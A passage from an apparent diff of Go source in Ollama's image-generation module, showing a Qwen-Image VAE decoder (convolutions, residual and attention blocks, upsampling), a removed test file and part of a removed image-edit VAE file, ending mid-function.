// ResBlocks handle their own pools
for _, block := range u.ResBlocks {
prev := x
x = block.Forward(x)
prev.Free()
}
// Upsampler handles its own pools
if u.Upsampler != nil {
prev := x
x = u.Upsampler.Forward(x)
prev.Free()
}
return x
}
// Upsample handles spatial upsampling
type Upsample struct {
Conv *mlx.Array
Bias *mlx.Array
Mode string
}
// newUpsample creates an upsampler
func newUpsample(weights *safetensors.ModelWeights, prefix string, dim int32, mode string) *Upsample {
conv, _ := weights.Get(prefix + ".resample.1.weight")
bias, _ := weights.Get(prefix + ".resample.1.bias")
return &Upsample{
Conv: conv,
Bias: bias,
Mode: mode,
}
}
// Forward applies upsampling to channels-last input [B, T, H, W, C]
// Uses staged pools to reduce peak memory during 2x upsampling
func (u *Upsample) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
outC := u.Conv.Shape()[0]
// Stage 1: 2x nearest neighbor upsample
{
x = mlx.Reshape(x, B*T, H, W, C)
x = upsample2xChannelsLast(x)
mlx.Eval(x)
}
// Stage 2: Conv + bias
{
prev := x
weight := mlx.Transpose(u.Conv, 0, 2, 3, 1)
x = conv2D3x3PaddedChannelsLast(x, weight)
if u.Bias != nil {
bias := mlx.Reshape(u.Bias, 1, 1, 1, outC)
x = mlx.Add(x, bias)
}
x = mlx.Reshape(x, B, T, H*2, W*2, outC)
prev.Free()
mlx.Eval(x)
}
return x
}
// MidBlock is the middle block of decoder
type MidBlock struct {
ResBlock1 *ResBlock
Attention *AttentionBlock
ResBlock2 *ResBlock
}
// newMidBlock creates a mid block
func newMidBlock(weights *safetensors.ModelWeights, prefix string, dim int32) (*MidBlock, error) {
res1, err := newResBlock(weights, prefix+".resnets.0", dim, dim)
if err != nil {
return nil, err
}
attn, err := newAttentionBlock(weights, prefix+".attentions.0", dim)
if err != nil {
return nil, err
}
res2, err := newResBlock(weights, prefix+".resnets.1", dim, dim)
if err != nil {
return nil, err
}
return &MidBlock{
ResBlock1: res1,
Attention: attn,
ResBlock2: res2,
}, nil
}
// Forward applies mid block
func (m *MidBlock) Forward(x *mlx.Array) *mlx.Array {
// Each component handles its own pools; we just free inputs
prev := x
x = m.ResBlock1.Forward(x)
prev.Free()
prev = x
x = m.Attention.Forward(x)
prev.Free()
prev = x
x = m.ResBlock2.Forward(x)
prev.Free()
return x
}
// VAEDecoder is the full VAE decoder
type VAEDecoder struct {
Config *VAEConfig
PostQuantConv *CausalConv3d
ConvIn *CausalConv3d
MidBlock *MidBlock
UpBlocks []*UpBlock
NormOut *RMSNorm3D
ConvOut *CausalConv3d
}
// Load loads the VAE decoder from a directory
func (m *VAEDecoder) Load(path string) error {
fmt.Println("Loading Qwen-Image VAE decoder...")
cfg := defaultVAEConfig()
m.Config = cfg
weights, err := safetensors.LoadModelWeights(path)
if err != nil {
return fmt.Errorf("weights: %w", err)
}
// Bulk load all weights as bf16
fmt.Print(" Loading weights as bf16... ")
if err := weights.Load(mlx.DtypeBFloat16); err != nil {
return fmt.Errorf("failed to load weights: %w", err)
}
fmt.Printf("✓ (%.1f GB)\n", float64(mlx.MetalGetActiveMemory())/(1024*1024*1024))
fmt.Print(" Loading post_quant_conv... ")
postQuantConv, err := newCausalConv3d(weights, "post_quant_conv")
if err != nil {
return err
}
m.PostQuantConv = postQuantConv
fmt.Println("✓")
fmt.Print(" Loading conv_in... ")
convIn, err := newCausalConv3d(weights, "decoder.conv_in")
if err != nil {
return err
}
m.ConvIn = convIn
fmt.Println("✓")
// Mid block (dim = base_dim * dim_mult[-1] = 96 * 4 = 384)
fmt.Print(" Loading mid_block... ")
midDim := cfg.BaseDim * cfg.DimMult[len(cfg.DimMult)-1]
midBlock, err := newMidBlock(weights, "decoder.mid_block", midDim)
if err != nil {
return err
}
m.MidBlock = midBlock
fmt.Println("✓")
// Up blocks (reversed dim_mult)
fmt.Print(" Loading up_blocks... ")
numUpBlocks := len(cfg.DimMult)
m.UpBlocks = make([]*UpBlock, numUpBlocks)
dimsMult := make([]int32, numUpBlocks+1)
dimsMult[0] = cfg.DimMult[numUpBlocks-1]
for i := 0; i < numUpBlocks; i++ {
dimsMult[i+1] = cfg.DimMult[numUpBlocks-1-i]
}
temporalUpsample := make([]bool, len(cfg.TemperalDownsample))
for i := range cfg.TemperalDownsample {
temporalUpsample[i] = cfg.TemperalDownsample[len(cfg.TemperalDownsample)-1-i]
}
for i := 0; i < numUpBlocks; i++ {
inDim := cfg.BaseDim * dimsMult[i]
outDim := cfg.BaseDim * dimsMult[i+1]
if i > 0 {
inDim = inDim / 2
}
upsampleMode := ""
if i < numUpBlocks-1 {
if temporalUpsample[i] {
upsampleMode = "upsample3d"
} else {
upsampleMode = "upsample2d"
}
}
prefix := fmt.Sprintf("decoder.up_blocks.%d", i)
upBlock, err := newUpBlock(weights, prefix, inDim, outDim, cfg.NumResBlocks, upsampleMode)
if err != nil {
return err
}
m.UpBlocks[i] = upBlock
}
fmt.Printf("✓ [%d blocks]\n", numUpBlocks)
fmt.Print(" Loading output layers... ")
normOut, err := newRMSNorm3D(weights, "decoder.norm_out", cfg.BaseDim)
if err != nil {
return err
}
m.NormOut = normOut
convOut, err := newCausalConv3d(weights, "decoder.conv_out")
if err != nil {
return err
}
m.ConvOut = convOut
fmt.Println("✓")
weights.ReleaseAll()
return nil
}
// LoadVAEDecoderFromPath is a convenience function to load VAE from path
func LoadVAEDecoderFromPath(path string) (*VAEDecoder, error) {
m := &VAEDecoder{}
if err := m.Load(filepath.Join(path, "vae")); err != nil {
return nil, err
}
return m, nil
}
// Decode converts latents to image
// z: [B, C, T, H, W] normalized latents
// Uses staged pools to free intermediate arrays and reduce peak memory.
func (vae *VAEDecoder) Decode(z *mlx.Array) *mlx.Array {
var x *mlx.Array
// Stage 1a: Denormalize and transpose
{
z = vae.Denormalize(z)
// Convert from channels-first [N, C, T, H, W] to channels-last [N, T, H, W, C]
z = mlx.Contiguous(mlx.Transpose(z, 0, 2, 3, 4, 1))
mlx.Eval(z)
}
// Stage 1b: PostQuantConv (handles its own pools)
x = vae.PostQuantConv.Forward(z)
z.Free()
// Stage 1c: ConvIn (handles its own pools)
{
prev := x
x = vae.ConvIn.Forward(x)
prev.Free()
}
// Stage 2: Mid block (handles its own pools)
x = vae.MidBlock.Forward(x)
// Stage 3: Up blocks (each handles its own pools)
for _, upBlock := range vae.UpBlocks {
x = upBlock.Forward(x)
}
// Stage 4a: NormOut + silu
{
prev := x
x = vae.NormOut.Forward(x)
x = silu3D(x)
prev.Free()
mlx.Eval(x)
}
// Stage 4b: ConvOut (handles its own pools)
{
prev := x
x = vae.ConvOut.Forward(x)
prev.Free()
}
// Stage 4c: Post-processing
{
prev := x
// Clamp to [-1, 1]
x = mlx.ClipScalar(x, -1.0, 1.0, true, true)
// Convert back from channels-last to channels-first
x = mlx.Contiguous(mlx.Transpose(x, 0, 4, 1, 2, 3))
prev.Free()
mlx.Eval(x)
}
return x
}
// Denormalize reverses the normalization applied during encoding
func (vae *VAEDecoder) Denormalize(z *mlx.Array) *mlx.Array {
shape := z.Shape()
C := shape[1]
mean := mlx.NewArray(vae.Config.LatentsMean[:C], []int32{1, C, 1, 1, 1})
std := mlx.NewArray(vae.Config.LatentsStd[:C], []int32{1, C, 1, 1, 1})
mean = mlx.ToBFloat16(mean)
std = mlx.ToBFloat16(std)
return mlx.Add(mlx.Mul(z, std), mean)
}
// Helper functions
func silu3D(x *mlx.Array) *mlx.Array {
return mlx.Mul(x, mlx.Sigmoid(x))
}
// pad3DChannelsLast pads a channels-last [B, T, H, W, C] tensor
func pad3DChannelsLast(x *mlx.Array, tBefore, tAfter, hBefore, hAfter, wBefore, wAfter int32) *mlx.Array {
if tBefore == 0 && tAfter == 0 && hBefore == 0 && hAfter == 0 && wBefore == 0 && wAfter == 0 {
return x
}
// Pad dims: [B before, B after, T before, T after, H before, H after, W before, W after, C before, C after]
return mlx.Pad(x, []int32{0, 0, tBefore, tAfter, hBefore, hAfter, wBefore, wAfter, 0, 0})
}
func pad2D(x *mlx.Array, hBefore, hAfter, wBefore, wAfter int32) *mlx.Array {
if hBefore == 0 && hAfter == 0 && wBefore == 0 && wAfter == 0 {
return x
}
return mlx.Pad(x, []int32{0, 0, 0, 0, hBefore, hAfter, wBefore, wAfter})
}
func conv2D1x1(x, weight *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
H := shape[2]
W := shape[3]
x = mlx.Transpose(x, 0, 2, 3, 1)
x = mlx.Reshape(x, B*H*W, shape[1])
wShape := weight.Shape()
var w *mlx.Array
if len(wShape) == 4 {
w = mlx.Reshape(weight, wShape[0], wShape[1])
} else {
w = weight
}
w = mlx.Transpose(w, 1, 0)
out := mlx.Linear(x, w)
outC := w.Dim(1)
out = mlx.Reshape(out, B, H, W, outC)
return mlx.Transpose(out, 0, 3, 1, 2)
}
func conv2D3x3Padded(x, weight *mlx.Array) *mlx.Array {
x = pad2D(x, 1, 1, 1, 1)
return conv2D(x, weight, 1, 1)
}
func conv2D(x, w *mlx.Array, strideH, strideW int32) *mlx.Array {
x = mlx.Transpose(x, 0, 2, 3, 1)
w = mlx.Transpose(w, 0, 2, 3, 1)
shape := x.Shape()
B := shape[0]
H := shape[1]
W := shape[2]
wShape := w.Shape()
Cout := wShape[0]
kH := wShape[1]
kW := wShape[2]
outH := (H-kH)/strideH + 1
outW := (W-kW)/strideW + 1
patches := extractPatches2D(x, kH, kW, strideH, strideW)
wFlat := mlx.Reshape(w, Cout, -1)
patches = mlx.Reshape(patches, B*outH*outW, -1)
out := mlx.Linear(patches, mlx.Transpose(wFlat, 1, 0))
out = mlx.Reshape(out, B, outH, outW, Cout)
return mlx.Transpose(out, 0, 3, 1, 2)
}
func extractPatches2D(x *mlx.Array, kH, kW, strideH, strideW int32) *mlx.Array {
shape := x.Shape()
B := shape[0]
H := shape[1]
W := shape[2]
C := shape[3]
outH := (H-kH)/strideH + 1
outW := (W-kW)/strideW + 1
patches := make([]*mlx.Array, outH*outW)
idx := 0
for i := int32(0); i < outH; i++ {
for j := int32(0); j < outW; j++ {
startH := i * strideH
startW := j * strideW
patch := mlx.Slice(x, []int32{0, startH, startW, 0}, []int32{B, startH + kH, startW + kW, C})
patch = mlx.Reshape(patch, B, kH*kW*C)
patches[idx] = patch
idx++
}
}
for i := range patches {
patches[i] = mlx.ExpandDims(patches[i], 1)
}
stacked := mlx.Concatenate(patches, 1)
return mlx.Reshape(stacked, B, outH, outW, kH*kW*C)
}
func upsample2x(x *mlx.Array) *mlx.Array {
shape := x.Shape()
H := shape[2]
W := shape[3]
rowIdxData := make([]int32, H*2)
for i := int32(0); i < H; i++ {
rowIdxData[i*2] = i
rowIdxData[i*2+1] = i
}
rowIdx := mlx.NewArrayInt32(rowIdxData, []int32{H * 2})
colIdxData := make([]int32, W*2)
for i := int32(0); i < W; i++ {
colIdxData[i*2] = i
colIdxData[i*2+1] = i
}
colIdx := mlx.NewArrayInt32(colIdxData, []int32{W * 2})
x = mlx.Take(x, rowIdx, 2)
x = mlx.Take(x, colIdx, 3)
return x
}
// upsample2xChannelsLast upsamples channels-last input [B, H, W, C] by 2x
func upsample2xChannelsLast(x *mlx.Array) *mlx.Array {
shape := x.Shape()
H := shape[1]
W := shape[2]
// Create repeat indices for rows
rowIdxData := make([]int32, H*2)
for i := int32(0); i < H; i++ {
rowIdxData[i*2] = i
rowIdxData[i*2+1] = i
}
rowIdx := mlx.NewArrayInt32(rowIdxData, []int32{H * 2})
// Create repeat indices for columns
colIdxData := make([]int32, W*2)
for i := int32(0); i < W; i++ {
colIdxData[i*2] = i
colIdxData[i*2+1] = i
}
colIdx := mlx.NewArrayInt32(colIdxData, []int32{W * 2})
// Take along H (axis 1) then W (axis 2)
x = mlx.Take(x, rowIdx, 1)
x = mlx.Take(x, colIdx, 2)
return x
}
// conv2D3x3PaddedChannelsLast applies 3x3 conv with padding to channels-last input [B, H, W, C]
// weight: [outC, kH, kW, inC] (MLX channels-last format)
func conv2D3x3PaddedChannelsLast(x, weight *mlx.Array) *mlx.Array {
// Pad spatial dims: [B, H, W, C] -> pad H and W by 1 each side
x = mlx.Pad(x, []int32{0, 0, 1, 1, 1, 1, 0, 0})
// Conv2d expects: input [B, H, W, inC], weight [outC, kH, kW, inC]
// stride=1, padding=0 (we already padded manually)
return mlx.Conv2d(x, weight, 1, 0)
}

View File

@@ -1,114 +0,0 @@
//go:build mlx
package qwen_image
import (
"math"
"os"
"testing"
"github.com/ollama/ollama/x/imagegen/mlx"
)
// TestVAEConfig tests configuration invariants.
func TestVAEConfig(t *testing.T) {
cfg := defaultVAEConfig()
// Property: latents_mean and latents_std have z_dim elements
if int32(len(cfg.LatentsMean)) != cfg.ZDim {
t.Errorf("latents_mean length != z_dim: %d != %d", len(cfg.LatentsMean), cfg.ZDim)
}
if int32(len(cfg.LatentsStd)) != cfg.ZDim {
t.Errorf("latents_std length != z_dim: %d != %d", len(cfg.LatentsStd), cfg.ZDim)
}
// Property: dim_mult defines 4 stages
if len(cfg.DimMult) != 4 {
t.Errorf("dim_mult should have 4 stages: got %d", len(cfg.DimMult))
}
// Property: temperal_downsample has 3 elements (for 3 transitions)
if len(cfg.TemperalDownsample) != 3 {
t.Errorf("temperal_downsample should have 3 elements: got %d", len(cfg.TemperalDownsample))
}
}
// TestVAELatentsNormalization tests the latent denormalization values.
func TestVAELatentsNormalization(t *testing.T) {
cfg := defaultVAEConfig()
// Verify latents_std values are all positive
for i, std := range cfg.LatentsStd {
if std <= 0 {
t.Errorf("latents_std[%d] should be positive: %v", i, std)
}
}
// Verify values are in reasonable range (from actual model)
for i, mean := range cfg.LatentsMean {
if math.Abs(float64(mean)) > 5 {
t.Errorf("latents_mean[%d] seems too large: %v", i, mean)
}
}
for i, std := range cfg.LatentsStd {
if std > 10 {
t.Errorf("latents_std[%d] seems too large: %v", i, std)
}
}
}
// TestVAEDecoderForward tests full forward pass (integration test).
// Skips if model weights are not available.
func TestVAEDecoderForward(t *testing.T) {
weightsPath := "../../../weights/Qwen-Image-2512/vae"
if _, err := os.Stat(weightsPath); os.IsNotExist(err) {
t.Skip("Skipping: model weights not found at " + weightsPath)
}
vae := &VAEDecoder{}
if err := vae.Load(weightsPath); err != nil {
t.Fatalf("Failed to load VAE decoder: %v", err)
}
mlx.Keep(mlx.Collect(vae)...)
// Small test input: [B, C, T, H, W]
// After 4 upsampling stages (2x each), H/W multiply by 16
batchSize := int32(1)
channels := int32(16)
frames := int32(1)
latentH := int32(4)
latentW := int32(4)
latents := mlx.RandomNormal([]int32{batchSize, channels, frames, latentH, latentW}, 0)
// Decode
out := vae.Decode(latents)
mlx.Eval(out)
// Verify output shape: [B, 3, T, H*16, W*16]
outShape := out.Shape()
if outShape[0] != batchSize {
t.Errorf("batch size: got %d, want %d", outShape[0], batchSize)
}
if outShape[1] != 3 {
t.Errorf("channels: got %d, want 3", outShape[1])
}
if outShape[2] != frames {
t.Errorf("frames: got %d, want %d", outShape[2], frames)
}
expectedH := latentH * 16 // 4 stages of 2x upsampling
expectedW := latentW * 16
if outShape[3] != expectedH || outShape[4] != expectedW {
t.Errorf("spatial dims: got [%d, %d], want [%d, %d]",
outShape[3], outShape[4], expectedH, expectedW)
}
// Verify output is in valid range (should be clamped to [0, 1] by decode)
outData := out.Data()
for i := 0; i < min(100, len(outData)); i++ {
if math.IsNaN(float64(outData[i])) || math.IsInf(float64(outData[i]), 0) {
t.Errorf("output[%d] not finite: %v", i, outData[i])
break
}
}
}

View File

@@ -1,682 +0,0 @@
//go:build mlx
package qwen_image_edit
import (
"fmt"
"math"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/safetensors"
)
// CausalConv3d is a causal 3D convolution (for temporal causality)
type CausalConv3d struct {
Weight *mlx.Array
Bias *mlx.Array
BiasReshaped *mlx.Array // [1, C, 1, 1, 1]
KernelT int32
}
// newCausalConv3d creates a 3D causal conv
func newCausalConv3d(weights *safetensors.ModelWeights, prefix string) (*CausalConv3d, error) {
weight, err := weights.Get(prefix + ".weight")
if err != nil {
return nil, fmt.Errorf("weight not found: %s", prefix)
}
bias, _ := weights.Get(prefix + ".bias")
kernelT := weight.Shape()[2]
outC := weight.Shape()[0]
var biasReshaped *mlx.Array
if bias != nil {
biasReshaped = mlx.Reshape(bias, 1, outC, 1, 1, 1)
}
return &CausalConv3d{
Weight: weight,
Bias: bias,
BiasReshaped: biasReshaped,
KernelT: kernelT,
}, nil
}
// Forward applies causal 3D convolution (or 2D if weight is 4D)
// x: [B, T, H, W, C] (channels-last, MLX format)
func (c *CausalConv3d) Forward(x *mlx.Array) *mlx.Array {
shape := c.Weight.Shape()
// Handle both 5D (3D conv) and 4D (2D conv) weights
if len(shape) == 4 {
// 2D conv: [O, I, kH, kW] - need to apply per-frame
return c.forward2D(x)
}
// 3D conv: [O, I, kT, kH, kW]
kernelT := shape[2]
kernelH := shape[3]
kernelW := shape[4]
// Causal temporal padding, same spatial padding
padT := kernelT - 1
padH := kernelH / 2
padW := kernelW / 2
// Stage 1: Pad
{
x = pad3DChannelsLast(x, padT, 0, padH, padH, padW, padW)
mlx.Eval(x)
}
// Stage 2: Conv + bias
var out *mlx.Array
{
prev := x
weight := mlx.Transpose(c.Weight, 0, 2, 3, 4, 1)
out = mlx.Conv3d(x, weight, 1, 1, 1, 0, 0, 0)
if c.Bias != nil {
bias := mlx.Reshape(c.Bias, 1, 1, 1, 1, c.Bias.Dim(0))
out = mlx.Add(out, bias)
}
prev.Free()
mlx.Eval(out)
}
return out
}
// forward2D applies 2D conv per-frame for [B, T, H, W, C] input
func (c *CausalConv3d) forward2D(x *mlx.Array) *mlx.Array {
xShape := x.Shape()
B := xShape[0]
T := xShape[1]
H := xShape[2]
W := xShape[3]
C := xShape[4]
wShape := c.Weight.Shape() // [O, I, kH, kW]
kernelH := wShape[2]
kernelW := wShape[3]
outC := wShape[0]
padH := kernelH / 2
padW := kernelW / 2
// Reshape to [B*T, H, W, C] for 2D conv
x = mlx.Reshape(x, B*T, H, W, C)
// Pad spatially
x = mlx.Pad(x, []int32{0, 0, padH, padH, padW, padW, 0, 0})
// Apply 2D conv
weight := mlx.Transpose(c.Weight, 0, 2, 3, 1) // [O, I, kH, kW] -> [O, kH, kW, I]
x = mlx.Conv2d(x, weight, 1, 0)
if c.Bias != nil {
bias := mlx.Reshape(c.Bias, 1, 1, 1, outC)
x = mlx.Add(x, bias)
}
// Get output spatial dims
outH := H
outW := W
// Reshape back to [B, T, H, W, C]
x = mlx.Reshape(x, B, T, outH, outW, outC)
mlx.Eval(x)
return x
}
// RMSNorm3D applies RMS normalization over channels
type RMSNorm3D struct {
Gamma *mlx.Array // [1, 1, 1, 1, C] for broadcasting
}
// newRMSNorm3D creates an RMS norm
func newRMSNorm3D(weights *safetensors.ModelWeights, prefix string, dim int32) (*RMSNorm3D, error) {
gamma, err := weights.Get(prefix + ".gamma")
if err != nil {
return nil, err
}
gamma = mlx.Reshape(gamma, 1, 1, 1, 1, gamma.Dim(0))
return &RMSNorm3D{Gamma: gamma}, nil
}
// Forward applies RMS norm to channels-last input [B, T, H, W, C]
func (n *RMSNorm3D) Forward(x *mlx.Array) *mlx.Array {
normalized := mlx.RMSNormNoWeight(x, 1e-6)
return mlx.Mul(normalized, n.Gamma)
}
// ResBlock is a residual block with RMS norm and causal convs
type ResBlock struct {
Norm1 *RMSNorm3D
Conv1 *CausalConv3d
Norm2 *RMSNorm3D
Conv2 *CausalConv3d
Shortcut *CausalConv3d
}
// newResBlock creates a residual block
func newResBlock(weights *safetensors.ModelWeights, prefix string, inDim, outDim int32) (*ResBlock, error) {
norm1, err := newRMSNorm3D(weights, prefix+".norm1", inDim)
if err != nil {
return nil, err
}
conv1, err := newCausalConv3d(weights, prefix+".conv1")
if err != nil {
return nil, err
}
norm2, err := newRMSNorm3D(weights, prefix+".norm2", outDim)
if err != nil {
return nil, err
}
conv2, err := newCausalConv3d(weights, prefix+".conv2")
if err != nil {
return nil, err
}
var shortcut *CausalConv3d
if inDim != outDim {
shortcut, err = newCausalConv3d(weights, prefix+".conv_shortcut")
if err != nil {
return nil, err
}
}
return &ResBlock{
Norm1: norm1,
Conv1: conv1,
Norm2: norm2,
Conv2: conv2,
Shortcut: shortcut,
}, nil
}
// Forward applies the residual block
func (r *ResBlock) Forward(x *mlx.Array) *mlx.Array {
var h *mlx.Array
mlx.Keep(x)
// Stage 1: norm1 + silu
{
h = r.Norm1.Forward(x)
h = silu3D(h)
mlx.Eval(h)
}
// Stage 2: conv1
{
prev := h
h = r.Conv1.Forward(h)
prev.Free()
}
// Stage 3: norm2 + silu
{
prev := h
h = r.Norm2.Forward(h)
h = silu3D(h)
prev.Free()
mlx.Eval(h)
}
// Stage 4: conv2
{
prev := h
h = r.Conv2.Forward(h)
prev.Free()
}
// Residual connection
if r.Shortcut != nil {
shortcut := r.Shortcut.Forward(x)
h = mlx.Add(h, shortcut)
mlx.Eval(h)
} else {
h = mlx.Add(h, x)
mlx.Eval(h)
}
return h
}
// AttentionBlock is a 2D attention block
type AttentionBlock struct {
Norm *RMSNorm3D
ToQKV *mlx.Array
ToQKVBias *mlx.Array
Proj *mlx.Array
ProjBias *mlx.Array
Dim int32
}
// newAttentionBlock creates an attention block
func newAttentionBlock(weights *safetensors.ModelWeights, prefix string, dim int32) (*AttentionBlock, error) {
norm, err := newRMSNorm3D(weights, prefix+".norm", dim)
if err != nil {
return nil, err
}
toQKV, _ := weights.Get(prefix + ".to_qkv.weight")
toQKVBias, _ := weights.Get(prefix + ".to_qkv.bias")
proj, _ := weights.Get(prefix + ".proj.weight")
projBias, _ := weights.Get(prefix + ".proj.bias")
return &AttentionBlock{
Norm: norm,
ToQKV: toQKV,
ToQKVBias: toQKVBias,
Proj: proj,
ProjBias: projBias,
Dim: dim,
}, nil
}
// Forward applies 2D attention
// Input: [B, T, H, W, C] (channels-last)
func (a *AttentionBlock) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
identity := x
// Flatten to [B*T, 1, H, W, C] for norm
x = mlx.Reshape(x, B*T, 1, H, W, C)
x = a.Norm.Forward(x)
x = mlx.Reshape(x, B*T, H, W, C)
// Flatten spatial to [B*T, H*W, C]
x = mlx.Reshape(x, B*T, H*W, C)
// Linear to get Q, K, V
wShape := a.ToQKV.Shape()
var w *mlx.Array
if len(wShape) == 4 {
w = mlx.Reshape(a.ToQKV, wShape[0], wShape[1])
} else {
w = a.ToQKV
}
w = mlx.Transpose(w, 1, 0)
qkv := mlx.Linear(x, w)
if a.ToQKVBias != nil {
qkv = mlx.Add(qkv, a.ToQKVBias)
}
qkv = mlx.Reshape(qkv, B*T, 1, H*W, 3*C)
q := mlx.Slice(qkv, []int32{0, 0, 0, 0}, []int32{B * T, 1, H * W, C})
k := mlx.Slice(qkv, []int32{0, 0, 0, C}, []int32{B * T, 1, H * W, 2 * C})
v := mlx.Slice(qkv, []int32{0, 0, 0, 2 * C}, []int32{B * T, 1, H * W, 3 * C})
scale := float32(1.0 / math.Sqrt(float64(C)))
out := mlx.ScaledDotProductAttention(q, k, v, scale, false)
out = mlx.Reshape(out, B*T, H*W, C)
// Project back
pShape := a.Proj.Shape()
var p *mlx.Array
if len(pShape) == 4 {
p = mlx.Reshape(a.Proj, pShape[0], pShape[1])
} else {
p = a.Proj
}
p = mlx.Transpose(p, 1, 0)
out = mlx.Linear(out, p)
if a.ProjBias != nil {
out = mlx.Add(out, a.ProjBias)
}
out = mlx.Reshape(out, B, T, H, W, C)
return mlx.Add(out, identity)
}
// UpBlock handles upsampling in decoder
type UpBlock struct {
ResBlocks []*ResBlock
Upsampler *Upsample
}
// newUpBlock creates an up block
func newUpBlock(weights *safetensors.ModelWeights, prefix string, inDim, outDim int32, numBlocks int32, upsampleMode string) (*UpBlock, error) {
resBlocks := make([]*ResBlock, numBlocks+1)
currentDim := inDim
for i := int32(0); i <= numBlocks; i++ {
resPrefix := fmt.Sprintf("%s.resnets.%d", prefix, i)
block, err := newResBlock(weights, resPrefix, currentDim, outDim)
if err != nil {
return nil, err
}
resBlocks[i] = block
currentDim = outDim
}
var upsampler *Upsample
if upsampleMode != "" {
upsampler = newUpsample(weights, prefix+".upsamplers.0", outDim, upsampleMode)
}
return &UpBlock{
ResBlocks: resBlocks,
Upsampler: upsampler,
}, nil
}
// Forward applies up block
func (u *UpBlock) Forward(x *mlx.Array) *mlx.Array {
for _, block := range u.ResBlocks {
prev := x
x = block.Forward(x)
prev.Free()
}
if u.Upsampler != nil {
prev := x
x = u.Upsampler.Forward(x)
prev.Free()
}
return x
}
// Upsample handles spatial upsampling
type Upsample struct {
Conv *mlx.Array
Bias *mlx.Array
Mode string
}
// newUpsample creates an upsampler
func newUpsample(weights *safetensors.ModelWeights, prefix string, dim int32, mode string) *Upsample {
conv, _ := weights.Get(prefix + ".resample.1.weight")
bias, _ := weights.Get(prefix + ".resample.1.bias")
return &Upsample{
Conv: conv,
Bias: bias,
Mode: mode,
}
}
// Forward applies upsampling to channels-last input [B, T, H, W, C]
func (u *Upsample) Forward(x *mlx.Array) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
outC := u.Conv.Shape()[0]
// Stage 1: 2x nearest neighbor upsample
{
x = mlx.Reshape(x, B*T, H, W, C)
x = upsample2xChannelsLast(x)
mlx.Eval(x)
}
// Stage 2: Conv + bias
{
prev := x
weight := mlx.Transpose(u.Conv, 0, 2, 3, 1)
x = conv2D3x3PaddedChannelsLast(x, weight)
if u.Bias != nil {
bias := mlx.Reshape(u.Bias, 1, 1, 1, outC)
x = mlx.Add(x, bias)
}
x = mlx.Reshape(x, B, T, H*2, W*2, outC)
prev.Free()
mlx.Eval(x)
}
return x
}
// MidBlock is the middle block
type MidBlock struct {
ResBlock1 *ResBlock
Attention *AttentionBlock
ResBlock2 *ResBlock
}
// newMidBlock creates a mid block
func newMidBlock(weights *safetensors.ModelWeights, prefix string, dim int32) (*MidBlock, error) {
res1, err := newResBlock(weights, prefix+".resnets.0", dim, dim)
if err != nil {
return nil, err
}
attn, err := newAttentionBlock(weights, prefix+".attentions.0", dim)
if err != nil {
return nil, err
}
res2, err := newResBlock(weights, prefix+".resnets.1", dim, dim)
if err != nil {
return nil, err
}
return &MidBlock{
ResBlock1: res1,
Attention: attn,
ResBlock2: res2,
}, nil
}
// Forward applies mid block
func (m *MidBlock) Forward(x *mlx.Array) *mlx.Array {
prev := x
x = m.ResBlock1.Forward(x)
prev.Free()
prev = x
x = m.Attention.Forward(x)
prev.Free()
prev = x
x = m.ResBlock2.Forward(x)
prev.Free()
return x
}
// Helper functions
func silu3D(x *mlx.Array) *mlx.Array {
return mlx.Mul(x, mlx.Sigmoid(x))
}
// pad3DChannelsLast pads a channels-last [B, T, H, W, C] tensor
func pad3DChannelsLast(x *mlx.Array, tBefore, tAfter, hBefore, hAfter, wBefore, wAfter int32) *mlx.Array {
if tBefore == 0 && tAfter == 0 && hBefore == 0 && hAfter == 0 && wBefore == 0 && wAfter == 0 {
return x
}
return mlx.Pad(x, []int32{0, 0, tBefore, tAfter, hBefore, hAfter, wBefore, wAfter, 0, 0})
}
// upsample2xChannelsLast upsamples channels-last input [B, H, W, C] by 2x
func upsample2xChannelsLast(x *mlx.Array) *mlx.Array {
shape := x.Shape()
H := shape[1]
W := shape[2]
rowIdxData := make([]int32, H*2)
for i := int32(0); i < H; i++ {
rowIdxData[i*2] = i
rowIdxData[i*2+1] = i
}
rowIdx := mlx.NewArrayInt32(rowIdxData, []int32{H * 2})
colIdxData := make([]int32, W*2)
for i := int32(0); i < W; i++ {
colIdxData[i*2] = i
colIdxData[i*2+1] = i
}
colIdx := mlx.NewArrayInt32(colIdxData, []int32{W * 2})
x = mlx.Take(x, rowIdx, 1)
x = mlx.Take(x, colIdx, 2)
return x
}
// conv2D3x3PaddedChannelsLast applies 3x3 conv with padding to channels-last input [B, H, W, C]
func conv2D3x3PaddedChannelsLast(x, weight *mlx.Array) *mlx.Array {
x = mlx.Pad(x, []int32{0, 0, 1, 1, 1, 1, 0, 0})
return mlx.Conv2d(x, weight, 1, 0)
}
// conv2DStrided applies conv with stride > 1 using manual patch extraction
// x: [B, H, W, C] (channels-last), weight: [O, kH, kW, I]
func conv2DStrided(x, weight *mlx.Array, stride int32) *mlx.Array {
shape := x.Shape()
B := shape[0]
H := shape[1]
W := shape[2]
wShape := weight.Shape()
Cout := wShape[0]
kH := wShape[1]
kW := wShape[2]
outH := (H - kH) / stride + 1
outW := (W - kW) / stride + 1
patches := extractPatches2DStrided(x, kH, kW, stride)
wFlat := mlx.Reshape(weight, Cout, -1)
patches = mlx.Reshape(patches, B*outH*outW, -1)
out := mlx.Linear(patches, mlx.Transpose(wFlat, 1, 0))
return mlx.Reshape(out, B, outH, outW, Cout)
}
// conv3DStrided applies 3D conv with strides using manual patch extraction
// x: [B, T, H, W, C] (channels-last), weight: [O, I, kT, kH, kW] (PyTorch format)
// strideT, strideH, strideW are the strides for each dimension
// Patches are extracted in [C, T, H, W] order to match Python's preprocessing
func conv3DStrided(x, weight *mlx.Array, strideT, strideH, strideW int32) *mlx.Array {
shape := x.Shape()
B := shape[0]
T := shape[1]
H := shape[2]
W := shape[3]
C := shape[4]
wShape := weight.Shape()
Cout := wShape[0]
// I := wShape[1]
kT := wShape[2]
kH := wShape[3]
kW := wShape[4]
// For temporal: if T < kT, we need to repeat frames temporally
// For single image with T=1 and kT=2, we duplicate the frame to T=kT
// Python Qwen2.5-VL duplicates the frame, not zero-pads
if T < kT {
